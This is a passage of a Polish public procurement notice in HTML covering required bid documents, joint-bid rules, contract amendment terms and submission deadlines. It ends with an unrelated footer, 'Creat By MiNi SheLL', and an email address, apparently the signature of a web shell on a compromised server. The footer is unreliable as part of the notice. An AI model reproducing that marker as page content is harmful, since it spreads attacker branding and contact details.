jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; - zgodnie z Załącznikiem nr 6 do SWZ.<br/>9)wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień́ niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – Załącznik nr 7 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia wraz z ofertą innych przedmiotowych środków dowodowych, niż dokumenty wskazane w<br/>Rozdziale XV pkt 3 ppkt. 1 lit a, b SWZ.<br/>Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) dokumenty niezbędne do dokonania oceny oferty w kryteriach oceny ofert:<br/>a) Oświadczenie w zakresie Aspektów innowacyjnych, zgodnie ze wzorem określonym w Załączniku nr 2 do SWZ Formularz<br/>oferty,<br/>b) Oświadczenie w zakresie Doświadczenia Koordynatora, zgodnie z wzorem stanowiącym Załącznik nr 7 do SWZ, <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) dokumenty niezbędne do dokonania oceny oferty w kryteriach oceny ofert:<br/>a) Oświadczenie w zakresie Aspektów innowacyjnych, zgodnie ze wzorem określonym w Załączniku nr 2 do SWZ Formularz<br/>oferty,<br/>b) Oświadczenie w zakresie Doświadczenia Koordynatora, zgodnie z wzorem stanowiącym Załącznik nr 7 do SWZ,<br/>2) oświadczenie o spełnieniu warunków w postępowaniu – Załącznik nr 3 do SWZ,<br/>3) oświadczenie o braku podstaw wykluczenia – Załącznik nr 4 do SWZ,<br/>4) zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych zasobów (jeżeli<br/>dotyczy) – Załącznik nr 8 do SWZ,<br/>5) oświadczenie podmiotu udostępniającego zasoby (jeżeli dotyczy) – Załącznik nr 9 do SWZ,<br/>6) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy) – Załącznik nr 10 do<br/>SWZ,<br/>7) Pełnomocnictwo do złożenia oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z<br/>ofertą; (jeżeli dotyczy),<br/>8) Pełnomocnictwo dla pełnomocnika ustanowionego przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>3. Oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi<br/>wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres<br/>umocowania.<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w art. 125<br/>ust.1 PZP stanowiące Załączniki nr 3 do SWZ oraz Załącznik nr 4 do SWZ, składa każdy z Wykonawców.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>usługi wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi Załącznik nr 10 do SWZ.<br/>6. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>7. Dokumenty wspólne, takie jak np.: oferta cenowa, wykaz usług głównych, wykaz osób itp. składa pełnomocnik<br/>Wykonawców w imieniu wszystkich Wykonawców składających ofertę wspólną,<br/>8. Wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za<br/>wykonanie umowy;<br/>9. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera),<br/>upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla<br/>wszystkich partnerów;<br/>10. Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>11. W przypadku wyboru oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, Zamawiający<br/>może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych<br/>wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach<br/>określonych we Wzorze Umowy, stanowiącym Załącznik nr 12 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/>uregulowanym w art. 454-455 PZP oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 12 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-17 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-17 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com